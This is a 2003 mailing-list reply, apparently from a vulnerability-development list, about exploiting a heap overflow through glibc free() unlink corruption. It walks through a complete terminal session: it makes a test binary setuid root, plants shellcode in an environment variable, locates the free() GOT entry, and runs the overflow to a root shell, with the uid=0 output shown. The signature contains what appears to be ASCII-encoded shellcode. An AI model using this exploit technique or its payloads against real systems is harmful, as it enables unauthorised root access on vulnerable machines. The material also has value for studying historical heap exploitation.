On Wed, 14 May 2003 16:48:33 -0700 "Cameron Brown" <cameronat_private> wrote: > Jon, > > I don't know about yours, but my version of free() (glibc-2.2.93) > trashes bytes 8-12 of the NOP sled as a side effect of the bogus unlink. > If I execute this trash, it acts like a call into bad memory and I > segfault. Fortunately, I found I can avoid this by adding a 12 byte > jump ("\xeb\x0c") at the front of the NOP sled. > > Just though it was worth mentioning. Yup, you're right.. I tried doing the same thing on different system and ran into that problem... had to put a jump in there.. I guess I just got lucky on my laptop the first time.. also, when exploiting on the command line.. \x0c can screw things up since it's the form feed character.. so here I just jumped over a little bit more.. matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root vuln1 matrix@overdose vuln-dev $ sudo chmod +s vuln1 matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell` matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.* 0xbffffa04 matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free 080495f8 R_386_JUMP_SLOT free matrix@overdose vuln-dev $ pcalc 0xf8-12 236 0xec 0y11101100 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";` sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP
This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:47:05 PDT